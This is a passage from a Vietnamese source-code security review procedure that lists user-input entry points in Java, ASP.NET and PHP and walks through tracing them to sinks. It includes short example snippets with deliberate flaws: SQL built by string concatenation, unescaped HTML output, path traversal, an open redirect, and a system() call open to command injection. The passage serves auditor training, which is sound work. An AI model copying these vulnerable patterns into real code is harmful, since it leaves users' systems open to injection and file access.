
getRemoteUser

getUserPrincipal

Nếu người dùng đã được xác thực, sẽ trả về thông tin chi tiết của người dùng

 • Điểm vào ứng dụng cũng có thể là Cookie, thông tin lưu trong Session. Chính vì thế những hàm lấy cookie, thông tin trong session trong ứng dụng cũng có thể là điểm vào ứng dụng. Ngôn ngữ Java sử dụng giao diện javax.servlet.http.HttpSession để lưu trữ, nhận thông tin về session hiện tại. Mỗi session sẽ được lưu trữ dưới dạng map, ánh xạ giữa tên dạng string tới giá trị của đối tượng. Bảng sau liệt kê những APIs cung cấp lưu trữ, lấy thông tin về session:

API

Mô tả

setAttribute

putValue

Lưu trữ data trong session hiện tại

getAttribute

getValue

getAttributeNames

getValueNames

Truy vấn data được lưu trữ

B. Ngôn ngữ ASP.NET:

 • Ứng dụng ASP.NET truy cập thông tin người dùng cung cấp thông qua lớp System.Web.HttpRequest. Lớp này cung cấp những thuộc tính, phương thức cho phép ứng dụng truy cập thông tin người dùng đệ trình. Những APIs đó được liệt kê trong bảng sau:

API

Mô tả

Params

Trả về mảng các Parameters

Item

Trả về tên của item trong mảng Params

Form

Trả về tên, giá trị trong form mà người dùng đệ trình

QueryString

Trả về tên, giá trị trong query string

ServerVariables

Trả về tên, giá trị trong ASP server variables

Headers

Trả về HTTP headers

Url

RawUrl

Trả về URL chi tiết

UrlReferrer

Trả về giá trị HTTP Referer

Cookies

Trả về tập hợp các Cookies

Files

Trả về tập hợp các File được người dùng upload

InputStream

BinaryRead

Request dạng raw được sử dụng bởi những APIs khác

HttpMethod

Trả về HTTP Method

Browser

UserAgent

Trả về HTTP User-Agent

AcceptTypes

Trả về HTTP Accept header

UserLanguages

Trả về HTTP Accept-Language header

C. Ngôn ngữ PHP:

 • PHP sử dụng biến mảng để lưu trữ thông tin người dùng gửi lên. Cụ thể trong bảng:

Biến

Mô tả

$_GET

$HTTP_GET_VARS

Trả về parameters người dùng đã gửi lên.

Ví dụ:

https://abc.com/search.php?query=foo

Giá trị của query được truy cập qua: $_GET[‘query’]

$_POST

$HTTP_POST_VARS

Chứa các parameters trong POST body data

$_COOKIE

$HTTP_COOKIE_VARS

Chứa các Cookie trong request

$_REQUEST

Chứa tất cả các item trong: $_GET, $_POST, và $_COOKIE

$_FILES

$HTTP_POST_FILES

Chứa file người dùng đã upload

$_SERVER[‘REQUEST_METHOD’]

Trả về HTTP Method

$_SERVER[‘QUERY_STRING’]

Trả về query string đầy đủ của request

$_SERVER[‘REQUEST_URI’]

Trả về URL trong request

$_SERVER[‘HTTP_ACCEPT’]

Trả về HTTP Accept header

$_SERVER[‘HTTP_ACCEPT_CHARSET’]

Trả về HTTP Accept-charset header

$_SERVER[‘HTTP_ACCEPT_ENCODING’]

Trả về HTTP Accept-encoding header

$_SERVER[‘HTTP_ACCEPT_LANGUAGE’]

Trả về HTTP Accept-language header

$_SERVER[‘HTTP_CONNECTION’]

Trả về HTTP Connection header

$_SERVER[‘HTTP_HOST’]

Trả về HTTP Host header

$_SERVER[‘HTTP_REFERER’]

Trả về HTTP Referer header

$_SERVER[‘HTTP_USER_AGENT’]

Trả về HTTP User-agent header

$_SERVER[‘PHP_SELF’]

Trả về tên filename script đang được thực thi

 • PHP sử dụng mảng $_SESSION để lưu trữ thông tin về người dùng, ví dụ:

$_SESSION[‘MyName’] = $_GET[‘username’]; // store user’s name

echo “Welcome “ . $_SESSION[‘MyName’]; // retrieve user’s name

 • Ngoài ra, mảng $HTTP_SESSION_VARS cũng được sử dụng tương tự. Ví dụ: Cần liệt kê tất cả điểm vào ứng dụng của một ứng dụng PHP, sử dụng công cụ tìm kiếm trong nội dung file để tìm kiếm. Trong hình sau sử dụng tính năng “Searcg File in File” của Notepadd++ để tìm kiếm:

Hình 71: Tìm kiếm với tất cả đầu vào ứng dụng lấy theo phương thức GET

Hình 72: Kết quả tìm kiếm tất cả điểm vào ứng dụng dạng GET trong ứng dụng.

 • Lưu ý:
 • Có thể sử dụng các trình IDE khác như Netbean, Eclipse để tìm kiếm.

 • Một số đoạn code tìm được có thể đặt trong phần comment, HTML output. Cần đi tới chi tiết đoạn code đó để kiểm tra, loại bỏ những điểm vào này. Một số editor hỗ trợ hight light màu của code sẽ hỗ trợ rất tốt công việc này.

 • Cập nhật thông tin về từng điểm vào ứng dụng vào bảng “Điểm vào ứng dụng” theo biểu mẫu BM06.QTĐG.ATTT.ĐVƯDMN.

2.2. Trace từ điểm vào ứng dụng.

 • Thực hiện với mỗi điểm vào ứng dụng điểm vào tìm được. Tiến hành Trace từng điểm vào. Lưu ý là các ngôn ngữ sẽ sử dụng phép đổi biến, các toán tử, phép rẽ nhánh… Người đánh giá cần am hiểu về ngôn ngữ, mã nguồn để hiểu được quá trình xử lý biến đầu vào.

 • Ví dụ: Điểm vào ứng dụng $_GET['username] được xác định ở bước trên. Điểm vào này xuất hiện ở dòng 5 file ‘low.php”. Truy cập nội dung file này:

Hình 73: Điểm vào ứng dụng $_GET['username]

Hình 74: Nội dung file low.php

 • Xác định $user = $_GET['username']; Tiếp tục trace theo biến $user.

 • Xác định biến $qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";

 • Tiếp tục trace theo biến $qry.Xác định $result = mysql_query( $qry ).

 • Đây là một điểm cuối ứng dụng. Tiếp tục trace tiếp biến $result và $qry để xác định xem có rẽ nhánh nào không.

 • Lưu ý: Trong quá trình trace sẽ có một số trường hợp:

 • Biến được đưa vào xử lý tại điểm cuối. Trường hợp này chưa tiến hành dừng trace biến này ngay mà tiến hành trace tiếp để xem có được sử dụng cho đổi biến, sử dụng cho điểm vào ứng dụng khác hay không.

 • Trường hợp câu lệnh rẽ nhánh (If-then, switch…): biến có thể đi theo các nhánh khác nhau. Trường hợp này cần đi hai nhánh khác nhau.

 • Trường hợp chèn file mã nguồn khác (include, import….), cần thực hiện trace trong file mã nguồn đó.

 • Việc trace biến có thể thực hiện bằng tay, tìm kiếm theo text (là tên biến). Có thể sử dụng một số script để tăng tốc độ tìm kiếm:

Hình 75: Script Python để trace biến

Hình 76: Sử dụng script để trace biến

 • Trong quá trình trace, biến có thể được xử lý bằng các hàm lọc, filter. Tùy mỗi ngôn ngữ, framework sẽ có những kiểu lọc khác nhau. Người đánh giá cần hiểu về những hàm lọc này. Ví dụ:

Hình 77: Sử dụng filter trong mã nguồn

 • Ví dụ trên sử dụng stripslashes và mysql_real_escape_string để filter. Phương pháp này dùng để chống tấn công SQL injection. Trong trường hợp cụ thể, có thể tham khảo chức năng của hàm để biết rõ cơ chế.

 • Người đánh giá nên tận dụng comment của đơn vị phát triển, hoặc liên hệ trực tiếp đơn vị phát triển để hiểu rõ chức năng, cách thức hoạt động của hàm.

 • Nếu có sử dụng hàm lọc, tiến hành cập nhật thông tin về các hàm, mục đích lọc vào bảng “Điểm vào ứng dụng trong mã nguồn” theo biểu mẫu BM06.QTĐG.ATTT.ĐVƯDMN.

 • Cập nhật thông tin về điểm cuối ứng dụng tương ứng với mỗi điểm vào ứng dụng vào bảng “Điểm vào ứng dụng trong mã nguồn” theo biểu mẫu BM06.QTĐG.ATTT.ĐVƯDMN.

 • Lưu ý sẽ có trường hợp điểm vào ứng dung có một điểm cuối, nhiều điểm cuối, không có điểm cuối. Cập nhật cụ thể từng điểm cuối này.

 • Cập nhật thông tin về hàm lọc – filter vào bảng nếu có sử dụng. Ghi rõ mục đích để chống lỗi gì, chống như thế nào (loại bỏ dấu ‘ hay “). Trường hợp phương pháp loại bỏ không triệt để thì cần ghi chú lại.

2.3 Phân tích điểm cuối, dự đoán khả năng mắc lỗi.

 • Dựa vào thông tin về điểm vào ứng dụng, trace biến của từng điểm vào ứng dụng, thông tin về điểm cuối, hàm lọc, tiến hành phân tích, đánh giá khả năng mắc lỗi.

 • Để xác định khả năng mắc lỗi, phụ thuộc vào cách thức tương tác tại điểm cuối ứng dụng. Thông thường, có các kiểu tương tác sau:

 • File System

 • Database

 • Code Execution

 • URL Redirection

 • Network/Socket

 • Tiến hành phân tích mã nguồn tại điểm cuối. Dựa vào đặc điểm xử lý tại điểm cuối, tiến hành phân loại khả năng mắc lỗi của điểm đầu/điểm cuối/nhánh đó.

 • Tuy nhiên, việc đánh giá xem có khả năng mắc lỗi không phụ thuộc vào từng loại ngôn ngữ, từng loại lỗ hổng cụ thể. Người đánh giá cần tập trung phân tích những hàm API được sử dụng trong quá trình từ điểm đầu tới điểm cuối ứng dụng. Mỗi loại ngôn ngữ lại có những API cụ thể.

 • Thông tin về lỗi dự đoán mắc phải của mỗi điểm vào/điểm cuối cập nhật vào bảng “Điểm vào ứng dụng trong mã nguồn” theo biểu mẫu BM06.QTĐG.ATTT.ĐVƯDMN.

2.4. Kiểm tra khả năng mắc lỗi.

 • Kiểm tra lại khả năng mắc lỗi của những điểm vào/điểm cuối ứng dụng đã dự đoán.

 • Phương pháp thực hiện như sau:

 • Dựa vào thông tin về các lỗi đã dự đoán, tiến hành kiểm tra lại có mắc lỗi hay không. Việc kiểm tra phụ thuộc vào từng loại ngôn ngữ cụ thể. Để kiểm tra lại có các cách.

 • Sử dụng phương pháp blackbox, kiểm tra khả năng mắc lỗi của điểm vào ứng dụng như đã trình bày ở phần trên.

 • Sử dụng phân tích mã nguồn, từ điểm vào ứng dụng tới điểm cuối để xác định khả năng mắc lỗi.

 • Việc kiểm tra bằng phân tích mã nguồn phụ thuộc vào từng loại ngôn ngữ cụ thể. Có thể khác nhau về vấn đề ngôn ngữ, xử lý. Tuy nhiên mỗi loại lỗi đều có những đặc trưng cụ thể riêng.

A. Cross-Site Scripting

 • Trong ví dụ về XSS sau đây, một phần mã HTML được gửi trả lại cho người dùng. Ở đây mục tiêu là HREF link được xây dựng bằng cách lấy trực tiếp từ thành phần người dùng gửi lên:

String link = “”;

objCell.InnerHtml = link;

 • Trong trường hợp khác, dữ liệu từ người dùng được sử dụng để thiết lập giá trị gửi trả về cho người dùng. Ví dụ sau thiết lập giá trị thành phần .

private void setPageTitle(HttpServletRequest request) throws ServletException

{

String requestType = request.getParameter(“type”);

if (“3”.equals(requestType) && null!=request.getParameter(“title”))

m_pageTitle = request.getParameter(“title”);

else m_pageTitle = “Online banking application”;

}

 • Việc xác định lỗ hổng XSS sẽ dễ dàng hơn nếu sử dụng phương pháp fuzzing. Như vậy: Có thể mắc lỗi XSS nếu như ứng dụng gửi trả lại thông tin người dùng đã truyền vào.

B. SQL Injection

 • Lỗ hổng SQL injection xuất hiện khi tiến hành cộng trực tiếp xâu mà người dùng nhập vào tạo thành truy vấn SQL, chuyển vào cho database thực hiện. Ví dụ như sau:

StringBuilder SqlQuery = newStringBuilder(“SELECT name, accno FROM TblCustomers WHERE “ + SqlWhere);

if(Request.QueryString[“CID”] != null &&

Request.QueryString[“PageId”] == “2”)

{

SqlQuery.Append(“ AND CustomerID = “);

SqlQuery.Append(Request.QueryString[“CID”].ToString());

}

...

C. Kiểm soát truy cập file

 • Dấu hiệu của lỗ hổng Path Traversal là dữ liệu từ người dùng được truyền vào filesystem API mà không có sự kiểm soát dữ liệu liên quan đến file được truyền vào. Trong một số trường hợp, đường dẫn file được hard-code, cho phép kẻ tấn công sử dụng dấu dot-dot-slash để nhảy lên thư mục khác. Ví dụ:

public byte[] GetAttachment(HttpRequest Request)

{

FileStream fsAttachment = new FileStream(SpreadsheetPath +

HttpUtility.UrlDecode(Request.QueryString[“AttachName”]),

FileMode.Open, FileAccess.Read, FileShare.Read);

byte[] bAttachment = new byte[fsAttachment.Length];

fsAttachment.Read(FileContent, 0,

Convert.ToInt32(fsAttachment.Length,

CultureInfo.CurrentCulture));

fsAttachment.Close();

return bAttachment;

}

C. Chuyển hướng người dùng

 • Tấn công này có thể dễ dàng phát hiện trong mã nguồn. Lỗi này này xuất hiện khi yêu cầu được tạo ra từ dữ liệu người dùng mã không có sự kiểm soát. Trong ví dụ sau người sử dụng cung cấp dữ liệu từ chuỗi truy vấn, sử dụng để xây dựng một URL chuyển hướng:

private void handleCancel()

{

httpResponse.Redirect(HttpUtility.UrlDecode(Request.QueryString[“refURL”]) + “&SiteCode=” + Request.QueryString[“SiteCode”].ToString() +“&UserId=” +Request.QueryString[“UserId”].ToString());

}

D. OS Command Injection

 • Đoạn code sau có dấu hiệu mắc lỗi Command Injection. Trong ví dụ sau: tham số message và address lấy từ form người dùng, được truyền trực tiếp tới UNIX system API:

void send_mail(const char *message, const char *addr)

{

char sendMailCmd[4096];

snprintf(sendMailCmd, 4096, “echo ‘%s’ | sendmail %s”, message, addr);

system(sendMailCmd);

return;

}

 • Lưu ý: Sử dụng thông tin về các hàm lọc trong quá trình phân tích từ điểm vào tới điểm cuối ứng dụng. Nếu từ điểm vào tới điểm cuối không sử dụng hàm lọc, dữ liệu từ người dùng được chuyển vào làm tham số trực tiếp trong tương tác tại điểm cuối thì có khả năng mắc.

 • Trường hợp có sử dụng lọc, nếu hàm lọc có khả năng tránh các lỗi tương ứng với lỗi có khả năng mắc phải thì điểm vào/điểm cuối đó không mắc lỗi. Nếu hàm lọc chưa đủ triệt để thì ứng dụng vẫn mắc lỗi.

 • Việc xác định xem hàm lọc có triệt để hay không phụ thuộc vào trình độ của người đánh giá. Người đánh giá nên liên lạc trực tiếp với đơn vị phát triển để xác định khả năng hàm lọc, từ đó, so sánh với những khả năng có thể xảy ra lỗi để xác định có mắc lỗi hay không.

 • Nên kết hợp giữa phân tích mã nguồn để hiểu quá trình xử lý từ điểm vào tới điểm cuối, từ đó sinh ra mã tấn công phù hợp để đưa vào kiểm tra khả năng mắc lỗi theo kiểu black box đã trình bày ở trên.

 • Ví dụ: Để chống XSS ứng dụng sử dụng lọc từ khóa “